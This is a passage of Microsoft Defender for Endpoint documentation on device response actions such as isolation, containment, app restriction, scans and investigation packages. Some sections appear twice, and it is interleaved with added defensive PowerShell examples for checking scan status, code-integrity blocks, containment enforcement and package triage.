The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When a scan is triggered through a Defender for Endpoint response action, the Microsoft Defender Antivirus ScanAvgCPULoadFactor setting still applies and limits the CPU impact of the scan. If ScanAvgCPULoadFactor is not configured, the default limit is 50% maximum CPU load during a scan. For more information, see configure-advanced-scan-types-microsoft-defender-antivirus.
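The following PowerShell is an added example, not code from this page or from Microsoft. It does on the device what an analyst usually wants to confirm around a portal-triggered scan: whether Microsoft Defender Antivirus is the active engine or in passive mode, what CPU throttle is in force, and what a quick scan actually found. It assumes an elevated session on the Windows device itself and uses only cmdlets from the built-in Defender module; the function names are mine.

```powershell
# Added example (not from the Microsoft Learn page). Run in an elevated
# PowerShell session on the device. Requires the built-in Defender module.

function Get-MdavScanContext {
    # Running mode tells you whether Defender AV is the primary engine or sits
    # in passive mode next to a third-party product; a scan works in both cases.
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    [pscustomobject]@{
        RunningMode          = $status.AMRunningMode            # 'Normal' or 'Passive Mode'
        RealTimeProtection   = $status.RealTimeProtectionEnabled
        SignatureAgeDays     = $status.AntivirusSignatureAge
        ScanAvgCPULoadFactor = $pref.ScanAvgCPULoadFactor       # default 50 (percent)
        LastQuickScanEnd     = $status.QuickScanEndTime
        LastFullScanEnd      = $status.FullScanEndTime
    }
}

function Invoke-MdavScanAndReport {
    param(
        [ValidateSet('QuickScan', 'FullScan')]
        [string] $ScanType = 'QuickScan',
        [ValidateRange(5, 100)]
        [int] $MaxCpuPercent = 50
    )
    # Same throttle the portal-triggered scan honours; set it explicitly so the
    # scan does not starve a production workload during incident response.
    Set-MpPreference -ScanAvgCPULoadFactor $MaxCpuPercent

    $started = Get-Date
    Start-MpScan -ScanType $ScanType        # blocks until the scan completes

    # Detections raised during the scan carry a timestamp after $started; these
    # are the same items that surface as Microsoft Defender Antivirus alerts.
    Get-MpThreatDetection |
        Where-Object { $_.InitialDetectionTime -ge $started } |
        Select-Object InitialDetectionTime, ThreatID, ProcessName, Resources
}

Get-MdavScanContext | Format-List
Invoke-MdavScanAndReport -ScanType QuickScan -MaxCpuPercent 30
```

If RunningMode reports passive mode, the scan still runs, but remediation is left to the third-party product; that is the case the Important note above is describing.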

Restrict app execution


In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important

- This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
- This feature is available if your organization uses Microsoft Defender Antivirus.
- This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment and select Confirm. The Action center will show the action details and the device timeline will include a new event.
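Because the restriction is enforced as a code integrity policy, every launch it refuses is recorded by Windows Code Integrity in the Microsoft-Windows-CodeIntegrity/Operational log (event 3077 for an enforced block, 3076 for audit). The PowerShell below is an added example, not code from this page or from Microsoft: it pulls those events from a restricted device so you can see which non-Microsoft-signed binaries an attacker, or a legitimate unsigned tool, tried to start. The EventData field names ('File Name', 'Process Name', 'PolicyName') are as observed on recent builds and should be checked against a sample event; the function name is mine.

```powershell
# Added example (not from the Microsoft Learn page). Run locally with admin
# rights, or against a remote device with WinRM enabled.

function Get-CodeIntegrityBlocks {
    param(
        [datetime] $Since = (Get-Date).AddHours(-24),
        [string]   $ComputerName = $env:COMPUTERNAME
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id        = 3076, 3077          # 3077 = blocked (enforced), 3076 = audit only
        StartTime = $Since
    }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # The XML payload exposes the blocked file and the launching process
            # as named EventData fields (names assumed, verify on one event).
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Mode       = if ($_.Id -eq 3077) { 'Blocked' } else { 'Audit' }
                File       = $data['File Name']
                Process    = $data['Process Name']
                PolicyName = $data['PolicyName']
            }
        }
}

# Everything that failed the Microsoft-signed-only policy since the restriction
# was applied; sort by count to spot repeated execution attempts.
Get-CodeIntegrityBlocks -Since (Get-Date).AddHours(-2) |
    Group-Object File |
    Sort-Object Count -Descending |
    Select-Object Count, Name
```

Run this before you select Remove app restrictions: a file that keeps reappearing in the blocked list after you thought the process was stopped usually points at a persistence mechanism that the investigation package's Autoruns folder should also show.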

Notification on device user

When an app is restricted, a notification is displayed on the device to inform the user that an app is being restricted from running.

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network


Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

- Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
- Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2.
- You can use the device isolation capability on all supported Microsoft Defender for Endpoint on Linux versions listed in System requirements. Ensure that the following prerequisites are present: iptables, ip6tables, and a Linux kernel built with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
- Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
- When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
- The feature supports VPN connections.
- You must have at least one of the following role permissions: 'Active remediation actions'. For more information, see Create and manage roles.
- You must have access to the device based on the device group settings. For more information, see Create and manage device groups.
- Exclusions for macOS and Linux isolation are not supported.
- An isolated Linux device is removed from isolation when an administrator modifies or adds an iptables rule on the isolated device.
- Isolating a server running Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select Confirm. The Action center will show the action details and the device timeline will include a new event.

7 Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation


The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive.
There's a downloadable script for these instances that you can run to forcibly release
devices from isolation. The script is available through a link in the UI.

7 Note

- Users with the Admin role or the 'Manage security settings in Security Center' permission can forcibly release devices from isolation.
- The script is valid for the specific device only.
- The script expires in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements
The minimum requirements for the 'forcibly release device from isolation' feature are:

- Supports only Windows.
- The following Windows versions are supported:
  - Windows 10 21H2 and 22H2 with KB5023773
  - Windows 11 version 21H2, all editions, with KB5023774
  - Windows 11 version 22H2, all editions, with KB5023778

Notification on device user

When a device is being isolated, a notification is displayed to inform the user that the device is being isolated from the network.

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network


When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is supported on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+ devices.

How to contain a device


1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.


Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from the action bar.

7 Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

- If a contained device changes its IP address, all Microsoft Defender for Endpoint onboarded devices will recognize this and start blocking communications with the new IP address. The original IP address will no longer be blocked (it may take up to 5 minutes to see these changes).
- In cases where the contained device's IP is used by another device on the network, there will be a warning while containing the device, with a link to advanced hunting (with a pre-populated query). This provides visibility into the other devices using the same IP to help you make a conscious decision about whether to continue with containing the device.
- In cases where the contained device is a network device, a warning will appear with a message that this may cause network connectivity issues (for example, containing a router that is acting as a default gateway). At this point, you can choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.
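Containment is enforced by the onboarded devices, not by the contained one, so a neighbour whose Base Filtering Engine is stopped simply keeps talking to the compromised host. The PowerShell below is an added example, not code from this page or from Microsoft: it checks BFE and the Defender for Endpoint sensor service (Sense) on a list of onboarded Windows devices over WinRM, reports which of them cannot enforce a containment, and sets BFE back to Automatic and running where it is merely stopped. The host names are placeholders and the function name is mine.

```powershell
# Added example (not from the Microsoft Learn page). Requires WinRM access to
# the target devices and local admin rights on them.

function Test-ContainmentEnforcer {
    param([Parameter(Mandatory)] [string[]] $ComputerName)

    Invoke-Command -ComputerName $ComputerName -ErrorAction Continue -ScriptBlock {
        $bfe   = Get-Service -Name BFE   -ErrorAction SilentlyContinue
        $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Device       = $env:COMPUTERNAME
            BfeStatus    = if ($bfe)   { $bfe.Status }    else { 'Missing' }
            BfeStartType = if ($bfe)   { $bfe.StartType } else { 'Missing' }
            SenseStatus  = if ($sense) { $sense.Status }  else { 'Missing' }
            # A device can only block a contained peer when the filtering engine
            # is running and the sensor that receives the contained IP is running.
            CanEnforce   = ($bfe -and $bfe.Status -eq 'Running') -and
                           ($sense -and $sense.Status -eq 'Running')
        }
    } | Select-Object Device, BfeStatus, BfeStartType, SenseStatus, CanEnforce
}

$devices = 'WS-FINANCE-01', 'SRV-FILE-02', 'WS-HR-07'   # placeholder names
$report  = Test-ContainmentEnforcer -ComputerName $devices
$report | Format-Table -AutoSize

# Remediate devices where BFE exists but is not running. Re-check a few minutes
# later: the contained IP is only picked up once the sensor and BFE are both up.
foreach ($r in $report | Where-Object { -not $_.CanEnforce -and $_.BfeStatus -ne 'Missing' }) {
    Invoke-Command -ComputerName $r.Device -ScriptBlock {
        Set-Service   -Name BFE -StartupType Automatic
        Start-Service -Name BFE
    }
}
```

A device reported as Missing for Sense is not onboarded and will never enforce the containment; treat it as an unmanaged neighbour of the contained host rather than as something this script can fix.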

Stop containing a device


You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that identity from accessing the network and different endpoints. Defender for Endpoint can "contain" an identity, blocking it from access and helping prevent attacks, specifically ransomware. When an identity is contained, any supported Microsoft Defender for Endpoint onboarded device will block incoming traffic in specific protocols related to attacks (network logons, RPC, SMB, RDP) while allowing legitimate traffic. This action can significantly help to reduce the impact of an attack. When an identity is contained, security operations analysts have extra time to locate, identify, and remediate the threat to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and higher), Windows Server 2019+ devices, and Windows Server 2012 R2 and 2016 with the modern agent.

How to contain a user


Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action center. Here, you can see when the action occurred and which users in your organization were contained.

Furthermore, after an identity is considered "contained", that user is blocked by Defender for Endpoint and cannot perform any malicious lateral movement or remote encryption on or to any supported Defender for Endpoint onboarded device. These blocks show up as alerts to help you quickly see the devices the compromised user attempted to access and the potential attack techniques.

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action center. In the side pane, select Undo.
2. Alternatively, select the user from the user inventory, the Incident page side pane, or the alert side pane, and select Undo.

This action restores the user's access to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the actions blocked for the compromised user. In the Device timeline view, you can see information about specific events, including protocol and interface granularity, and the relevant MITRE technique associated with each one.

In addition, you can expand the investigation by using Advanced Hunting. Look for any "Action Type" starting with "Contain" in the "DeviceEvents" table. You can then view all the individual blocking events related to Contain User in your tenant, dive deeper into the context of each block, and extract the different entities and techniques associated with those events.
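The PowerShell below is an added example, not code from this page or from Microsoft. It runs the advanced hunting query the paragraph describes (DeviceEvents rows whose ActionType starts with "Contain") through the Microsoft Graph advanced hunting endpoint and summarizes the blocks by action, device, account and source IP, which is the quickest way to see which hosts a contained identity kept trying to reach. It assumes you already hold a Microsoft Graph access token with the ThreatHunting.Read.All permission in $token (obtaining it is outside this page); the function name and the choice of summarize columns are mine.

```powershell
# Added example (not from the Microsoft Learn page). Assumes $token holds a
# valid Microsoft Graph access token with ThreatHunting.Read.All.

function Get-ContainUserBlocks {
    param(
        [Parameter(Mandatory)] [string] $AccessToken,
        [int] $LookbackDays = 7
    )
    # Same filter the documentation describes, plus a summarize so one row per
    # (action, device, account, source) comes back instead of every block.
    $kql = @"
DeviceEvents
| where Timestamp > ago(${LookbackDays}d)
| where ActionType startswith "Contain"
| summarize Blocks = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp)
    by ActionType, DeviceName, AccountName, RemoteIP
| order by Blocks desc
"@
    $resp = Invoke-RestMethod -Method Post `
        -Uri 'https://graph.microsoft.com/v1.0/security/runHuntingQuery' `
        -Headers @{ Authorization = "Bearer $AccessToken" } `
        -ContentType 'application/json' `
        -Body (@{ Query = $kql } | ConvertTo-Json)

    # The response carries a 'schema' (column list) and 'results' (rows keyed
    # by column name); only the rows are needed here.
    $resp.results |
        Select-Object ActionType, DeviceName, AccountName, RemoteIP, Blocks, FirstSeen, LastSeen
}

Get-ContainUserBlocks -AccessToken $token -LookbackDays 3 | Format-Table -AutoSize
```

A single device accumulating blocks from many RemoteIP values is the pattern to look for: it is the host the contained account was trying to use as a pivot, and the one whose investigation package is worth collecting next.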

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially compromised device or an already compromised one. Microsoft Threat Experts can be engaged directly from within the Microsoft Defender XDR portal for a timely and accurate response. Experts provide insights not just regarding a potentially compromised device, but also to help you better understand complex threats, the targeted attack notifications that you receive, alerts you need more information about, or threat intelligence context that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file. You'll be able to view the following details:

- Investigation package collection
- Antivirus scan
- App restriction
- Device isolation

All other related details are also shown, for example, submission date/time, submitting user, and whether the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

) Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation package. After taking action on devices, you can check activity details in the Action center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

- Run antivirus scan
- Isolate device
- Stop and quarantine a file
- Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file" action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation


You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated investigations.

Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices


As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the device page.
2. Add comments and select Confirm.
3. Select Action center from the response actions section of the device page.
4. Select Package collection package available to download the collection package.

For Windows devices, the package contains the following folders:

Autoruns: Contains a set of files that each represent the content of the registry of a known auto start entry point (ASEP) to help identify the attacker's persistence on the device.
NOTE: If the registry key is not found, the file will contain the following message: "ERROR: The system was unable to find the specified registry key or value."

Installed programs: This .CSV file contains the list of installed programs that can help identify what is currently installed on the device. For more information, see Win32_Product class.

Network connections: This folder contains a set of data points related to the connectivity information that can help in identifying connectivity to suspicious URLs, attacker's command and control (C&C) infrastructure, any lateral movement, or remote connections.
- ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network connections. Provides the ability to look for suspicious connectivity made by a process.
- Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all interfaces. The ARP cache can reveal other hosts on a network that have been compromised or suspicious systems on the network that might have been used to run an internal attack.
- DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. This can help in identifying suspicious connections.
- IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can represent physical interfaces, such as installed network adapters, or logical interfaces, such as dial-up connections.
- FirewallExecutionLog.txt and pfirewall.log
NOTE: The pfirewall.log file must exist in %windir%\system32\logfiles\firewall\pfirewall.log for it to be included in the investigation package. For more information on creating the firewall log file, see Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files: Windows Prefetch files are designed to speed up the application startup process. They can be used to track all the files recently used in the system and find traces of applications that might have been deleted but can still be found in the prefetch file list.
- Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch. NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
- PrefetchFilesList.txt: Contains the list of all the copied files, which can be used to track whether there were any copy failures to the prefetch folder.

Processes: Contains a .CSV file listing the running processes and provides the ability to identify current processes running on the device. This can be useful when identifying a suspicious process and its state.

Scheduled tasks: Contains a .CSV file listing the scheduled tasks, which can be used to identify routines performed automatically on a chosen device to look for suspicious code that was set to run automatically.

Security event log: Contains the security event log, which contains records of login or logout activity, or other security-related events specified by the system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services: Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions: Lists shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. This can help identify data exfiltration or lateral movement. Contains files for SMBInboundSessions and SMBOutboundSession.
NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells you that there are no SMB sessions found.

System Information: Contains a SystemInformation.txt file that lists system information such as OS version and network cards.

Temp Directories: Contains a set of text files that list the files located in %Temp% for every user in the system. This can help to track suspicious files that an attacker may have dropped on the system.
NOTE: If the file contains the following message: "The system cannot find the path specified", it means that there is no temp directory for this user, which might be because the user didn't log in to the system.

Users and Groups: Provides a list of files that each represent a group and its members.

WdSupportLogs: Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
NOTE: This folder is only created on Windows 10, version 1709 or later with the February 2020 update rollup or a more recent update installed:
- Win10 1709 (RS3) Build 16299.1717: KB4537816
- Win10 1803 (RS4) Build 17134.1345: KB4537795
- Win10 1809 (RS5) Build 17763.1075: KB4537818
- Win10 1903/1909 (19H1/19H2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls: This file is a summary of the investigation package collection. It contains the list of data points, the command used to extract each one, the execution status, and the error code if there was a failure. Use this report to check that the package includes all the expected data and to identify any errors.
The collection packages for macOS and Linux devices contain the following:

Applications
  macOS: A list of all installed applications
  Linux: Not applicable

Disk volume
  macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
  Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
  macOS: A list of all open files with the corresponding processes using these files
  Linux: A list of all open files with the corresponding processes using these files

History
  macOS: Shell history
  Linux: Not applicable

Kernel modules
  macOS: All loaded modules
  Linux: Not applicable

Network connections
  macOS: Active connections; active listening connections; ARP table; firewall rules; interface configuration; proxy settings; VPN settings
  Linux: Active connections; active listening connections; ARP table; firewall rules; IP list; proxy settings

Processes
  macOS: A list of all running processes
  Linux: A list of all running processes

Services and scheduled tasks
  macOS: Certificates; configuration profiles; hardware information
  Linux: CPU details; hardware information; operating system information

System security information
  macOS: Extensible Firmware Interface (EFI) integrity information; firewall status; Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
  Linux: Not applicable

Users and groups
  macOS: Login history; sudoers
  Linux: Login history; sudoers
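The PowerShell below is an added example, not code from this page or from Microsoft: a first-pass triage of a downloaded Windows investigation package that uses the documented file names and error strings from the folder list above. It expands the zip, keeps only the Autoruns entries that actually resolved (the page documents the "ERROR: The system was unable to find..." text written for absent keys), extracts established and listening connections from ActiveNetConnections.txt, and lists the users whose Temp directory had content (the page documents the "cannot find the path specified" text for users who never logged in). The folder names are taken from the table and the assumption that ActiveNetConnections.txt is netstat-style text should be verified against a real package; the zip path and function names are mine.

```powershell
# Added example (not from the Microsoft Learn page). Folder and file names come
# from the documented package layout; the netstat-style parsing is an assumption.

function Expand-InvestigationPackage {
    param([Parameter(Mandatory)] [string] $ZipPath)
    $dest = Join-Path $env:TEMP ('mde-pkg-' + [IO.Path]::GetFileNameWithoutExtension($ZipPath))
    Expand-Archive -LiteralPath $ZipPath -DestinationPath $dest -Force
    $dest
}

function Get-PackageTriage {
    param([Parameter(Mandatory)] [string] $Root)

    # Autoruns: one file per ASEP. Files without the documented "not found"
    # message are populated persistence points and deserve a look.
    $asepMissing = 'ERROR:\s*The system was unable to find the specified'
    $autoruns = Get-ChildItem (Join-Path $Root 'Autoruns') -File -ErrorAction SilentlyContinue |
        Where-Object { (Get-Content $_.FullName -Raw) -notmatch $asepMissing } |
        Select-Object -ExpandProperty Name

    # Network: keep ESTABLISHED/LISTENING rows and drop loopback noise.
    $netFile = Join-Path $Root 'Network connections\ActiveNetConnections.txt'
    $connections = if (Test-Path $netFile) {
        Get-Content $netFile |
            Where-Object { $_ -match '^\s*(TCP|UDP)\s+\S+\s+\S+' } |
            Where-Object { $_ -match 'ESTABLISHED|LISTENING' -and $_ -notmatch '127\.0\.0\.1|\[::1\]' }
    } else { @() }

    # Temp: users whose %Temp% listing is not the documented "path not found"
    # message had a profile on the box; their temp content is where drops land.
    $tempUsers = Get-ChildItem (Join-Path $Root 'Temp Directories') -File -ErrorAction SilentlyContinue |
        Where-Object { (Get-Content $_.FullName -Raw) -notmatch 'cannot find the path specified' } |
        Select-Object -ExpandProperty Name

    [pscustomobject]@{
        PopulatedAseps    = $autoruns
        ActiveConnections = $connections
        UsersWithTempData = $tempUsers
    }
}

$root = Expand-InvestigationPackage -ZipPath 'C:\cases\case-1042\package.zip'   # placeholder path
Get-PackageTriage -Root $root | Format-List
```

Open CollectionSummaryReport.xls before trusting any empty result: a folder that is missing because its collector failed looks identical, from this script's point of view, to a folder that was collected and found nothing.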

Run Microsoft Defender Antivirus scan on devices
As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

- This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
- A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run (quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When a scan is triggered through a Defender for Endpoint response action, the Microsoft Defender Antivirus ScanAvgCPULoadFactor setting still applies and limits the CPU impact of the scan. If ScanAvgCPULoadFactor is not configured, the default limit is 50% maximum CPU load during a scan. For more information, see configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution


In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important

- This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
- This feature is available if your organization uses Microsoft Defender Antivirus.
- This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment and select Confirm. The Action center will show the action details and the device timeline will include a new event.

Notification on device user

When an app is restricted, a notification is displayed on the device to inform the user that an app is being restricted from running.

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network


Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

- Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
- Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2.
- You can use the device isolation capability on all supported Microsoft Defender for Endpoint on Linux versions listed in System requirements. Ensure that the following prerequisites are present: iptables, ip6tables, and a Linux kernel built with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
- Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
- When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
- The feature supports VPN connections.
- You must have at least one of the following role permissions: 'Active remediation actions'. For more information, see Create and manage roles.
- You must have access to the device based on the device group settings. For more information, see Create and manage device groups.
- Exclusions for macOS and Linux isolation are not supported.
- An isolated Linux device is removed from isolation when an administrator modifies or adds an iptables rule on the isolated device.
- Isolating a server running Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select Confirm. The Action center will show the action details and the device timeline will include a new event.

Note

The device remains connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to allow Outlook and Skype for
Business communication, you can still communicate with the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. For these instances there's a downloadable script that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

Note

Admins and users with the 'Manage security settings in Security Center' permission can forcibly release devices from isolation.
The script is valid for the specific device only.
The script expires in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from isolation from the action menu.
2. In the wizard on the right-hand side, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Windows only.
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
